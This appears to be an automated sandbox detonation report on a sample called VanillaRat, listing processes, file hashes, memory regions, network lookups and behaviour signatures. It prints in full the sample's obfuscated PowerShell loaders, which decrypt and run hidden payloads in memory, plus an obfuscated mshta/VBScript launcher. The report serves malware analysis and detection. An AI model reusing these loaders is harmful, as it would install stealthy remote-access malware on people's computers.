"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ab616338-5d41-471f-8826-e2cd790c98c0}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{a8c0eac3-74a5-46f2-9a3e-6e6875b0357f}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function UdTTc($fvgoo){ $sihCR=[System.Security.Cryptography.Aes]::Create(); $sihCR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $sihCR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $sihCR.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HCyEf1YafduI2gaayTiiJc0BcZzdl+wOYfZmYK/MNnc='); $sihCR.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KN9rIUT3LMorVQMyobJ55g=='); $TeypB=$sihCR.('rotpyrceDetaerC'[-1..-15] -join '')(); $dmEot=$TeypB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fvgoo, 0, $fvgoo.Length); $TeypB.Dispose(); $sihCR.Dispose(); $dmEot;}function rqQZg($fvgoo){ $ympdX=New-Object System.IO.MemoryStream(,$fvgoo); $YpWOM=New-Object System.IO.MemoryStream; $fxvtV=New-Object System.IO.Compression.GZipStream($ympdX, [IO.Compression.CompressionMode]::Decompress); $fxvtV.CopyTo($YpWOM); $fxvtV.Dispose(); $ympdX.Dispose(); $YpWOM.Dispose(); $YpWOM.ToArray();}function fbHSv($fvgoo,$amDjr){ $iypoS=[System.Reflection.Assembly]::Load([byte[]]$fvgoo); $mDfQt=$iypoS.EntryPoint; $mDfQt.Invoke($null, $amDjr);}$sihCR1 = New-Object System.Security.Cryptography.AesManaged;$sihCR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sihCR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sihCR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HCyEf1YafduI2gaayTiiJc0BcZzdl+wOYfZmYK/MNnc=');$sihCR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KN9rIUT3LMorVQMyobJ55g==');$khIZV = $sihCR1.('rotpyrceDetaerC'[-1..-15] -join '')();$QOKgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l41V2WxL9jkprJcxS5Nj8A==');$QOKgA = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA, 0, $QOKgA.Length);$QOKgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA);$gPPoi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aROoNBcsZ/PW5d2DYHVzdO8nR2VzRJCqHmYigLb6Jrs=');$gPPoi = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPPoi, 0, $gPPoi.Length);$gPPoi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPPoi);$YyGbR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OkYia47+jaf2xVNWbMpC2Q==');$YyGbR = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YyGbR, 0, $YyGbR.Length);$YyGbR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YyGbR);$NGxnm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UP/EOIJWq+4ghvON19uciyQbICBLdoMJpFC0ksKBSJnw4OjSJ3hNKvrvEz2D1CqWZeOjzkO6q7JNywlpjDo/HsSRUmq3ccngTHm9XJej3zwQT3J68V0tpZUrw5HlEx72QEBCzfoKwyEbutYu6tnr1aPtRABJ4gfBVc7hAGl7iFU1xOqulzEW9VCdQmV3l/XcqcwaWBGT4wqFMxb3ZLGT6dcBux6AJSpiqyO9qz1cMeCPoduh33z6ScFknrT57PjsKVugEp449IOSaJw/Zs5f9EG1eKOHsmSxGt55TMZKWpTlR+9ITlk1NoYWpUkwaocQ3BUDxHEdM58P2Tq0P5vFhBc7sNLjFZEo9FrrcNtCu/8C47g4vYoBrmKKGYmZBkTLyTUUtN/HfYPnelsAIjtdj976Vlk2ugGP1f2Y3nGeegA=');$NGxnm = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NGxnm, 0, $NGxnm.Length);$NGxnm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NGxnm);$zWEEc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('81O15VE8m4lB+MnqiTR1uA==');$zWEEc = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zWEEc, 0, $zWEEc.Length);$zWEEc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zWEEc);$eNHHL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BVmHLrMLSPnDAnkqy9pFoQ==');$eNHHL = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eNHHL, 0, $eNHHL.Length);$eNHHL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eNHHL);$qBjEF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pLtK/cPeeTiGMmymKQ6Fcw==');$qBjEF = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qBjEF, 0, $qBjEF.Length);$qBjEF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qBjEF);$pCyOn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2NYpuHYegPYo5qCfIlZhMQ==');$pCyOn = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pCyOn, 0, $pCyOn.Length);$pCyOn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pCyOn);$qGSgp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFmRHuVf/LPmEPegX+g5Zw==');$qGSgp = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qGSgp, 0, $qGSgp.Length);$qGSgp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qGSgp);$QOKgA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6P/YK+QQ0JTDdLrribGmsA==');$QOKgA0 = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA0, 0, $QOKgA0.Length);$QOKgA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA0);$QOKgA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lIYWfiAlubjLUZJrugkuA==');$QOKgA1 = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA1, 0, $QOKgA1.Length);$QOKgA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA1);$QOKgA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('//+9JxvND8cXl6QyLO8bkA==');$QOKgA2 = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA2, 0, $QOKgA2.Length);$QOKgA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA2);$QOKgA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0KfLJH3W0jtfi/p3tJXm2Q==');$QOKgA3 = $khIZV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QOKgA3, 0, $QOKgA3.Length);$QOKgA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QOKgA3);$khIZV.Dispose();$sihCR1.Dispose();if (@(get-process -ea silentlycontinue $QOKgA3).count -gt 1) {exit};$wGOvn = [Microsoft.Win32.Registry]::$pCyOn.$qBjEF($QOKgA).$eNHHL($gPPoi);$agzwV=[string[]]$wGOvn.Split('\');$alLGs=rqQZg(UdTTc([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($agzwV[1])));fbHSv $alLGs (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$vPzyo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($agzwV[0]);$sihCR = New-Object System.Security.Cryptography.AesManaged;$sihCR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sihCR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sihCR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HCyEf1YafduI2gaayTiiJc0BcZzdl+wOYfZmYK/MNnc=');$sihCR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KN9rIUT3LMorVQMyobJ55g==');$TeypB = $sihCR.('rotpyrceDetaerC'[-1..-15] -join '')();$vPzyo = $TeypB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($vPzyo, 0, $vPzyo.Length);$TeypB.Dispose();$sihCR.Dispose();$ympdX = New-Object System.IO.MemoryStream(, $vPzyo);$YpWOM = New-Object System.IO.MemoryStream;$fxvtV = New-Object System.IO.Compression.GZipStream($ympdX, [IO.Compression.CompressionMode]::$QOKgA1);$fxvtV.$qGSgp($YpWOM);$fxvtV.Dispose();$ympdX.Dispose();$YpWOM.Dispose();$vPzyo = $YpWOM.ToArray();$GJmqW = $NGxnm | IEX;$iypoS = $GJmqW::$QOKgA2($vPzyo);$mDfQt = $iypoS.EntryPoint;$mDfQt.$QOKgA0($null, (, [string[]] ($YyGbR)))
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gpl5cv03.mdi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3084-4-0x000001C1E9A80000-0x000001C1E9AA2000-memory.dmp
memory/3084-14-0x00007FFDC0700000-0x00007FFDC11C1000-memory.dmp
memory/3084-15-0x000001C1E8950000-0x000001C1E8960000-memory.dmp
memory/3084-16-0x000001C1E8950000-0x000001C1E8960000-memory.dmp
memory/3084-17-0x00007FFDC0700000-0x00007FFDC11C1000-memory.dmp
memory/3084-18-0x000001C1A8000000-0x000001C1A8024000-memory.dmp
memory/3084-19-0x000001C1E8950000-0x000001C1E8960000-memory.dmp
memory/3084-20-0x00007FFDDFE50000-0x00007FFDE0045000-memory.dmp
memory/3084-21-0x00007FFDDE5E0000-0x00007FFDDE69E000-memory.dmp
memory/3084-22-0x000001C1982C0000-0x000001C198D0E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/3084-24-0x00007FFDCC710000-0x00007FFDCC729000-memory.dmp
memory/3084-25-0x000001C198D20000-0x000001C198DC4000-memory.dmp
memory/3084-26-0x000001C198DD0000-0x000001C198E26000-memory.dmp
memory/3084-27-0x000001C198E30000-0x000001C198E88000-memory.dmp
memory/3084-28-0x000001C198E90000-0x000001C198EB2000-memory.dmp
memory/3084-29-0x00007FFDDFE50000-0x00007FFDE0045000-memory.dmp
memory/3084-31-0x000001C199170000-0x000001C19917A000-memory.dmp
memory/4612-32-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4612-34-0x0000000140000000-0x0000000140004000-memory.dmp
memory/884-35-0x0000000000400000-0x0000000000406000-memory.dmp
memory/884-37-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-powershell.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Windows\$sxr-powershell.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/3504-51-0x00007FFDC0700000-0x00007FFDC11C1000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2023-11-01 11:02
Reported
2023-11-01 11:05
Platform
win7-20231020-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Start.bat"
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
Main\\VanillaRat.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\VanillaRat\\\Handlers\\HandlerInstaller.bat' -WindowStyle Hidden -Wait}"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat" "
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
memory/2176-4-0x0000000000C90000-0x0000000000E58000-memory.dmp
memory/2176-5-0x0000000074620000-0x0000000074D0E000-memory.dmp
memory/2168-6-0x0000000002380000-0x0000000002400000-memory.dmp
memory/2168-7-0x000000001B290000-0x000000001B572000-memory.dmp
memory/2168-8-0x0000000001E60000-0x0000000001E68000-memory.dmp
memory/2168-9-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2168-10-0x0000000002380000-0x0000000002400000-memory.dmp
memory/2168-11-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2168-12-0x0000000002380000-0x0000000002400000-memory.dmp
memory/2168-13-0x0000000002380000-0x0000000002400000-memory.dmp
memory/2176-14-0x0000000004A40000-0x0000000004A80000-memory.dmp
memory/2176-15-0x00000000052F0000-0x00000000053D0000-memory.dmp
memory/2176-16-0x0000000004A40000-0x0000000004A80000-memory.dmp
memory/2176-17-0x0000000074620000-0x0000000074D0E000-memory.dmp
memory/2168-18-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2168-19-0x0000000002380000-0x0000000002400000-memory.dmp
memory/2168-20-0x0000000002380000-0x0000000002400000-memory.dmp
\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2168-26-0x0000000002380000-0x0000000002400000-memory.dmp
memory/2156-27-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2156-29-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/2156-28-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/2168-30-0x0000000002380000-0x0000000002400000-memory.dmp
memory/2156-31-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2156-32-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/2176-33-0x0000000004A40000-0x0000000004A80000-memory.dmp
memory/2156-34-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/2156-35-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2168-36-0x000007FEF5880000-0x000007FEF621D000-memory.dmp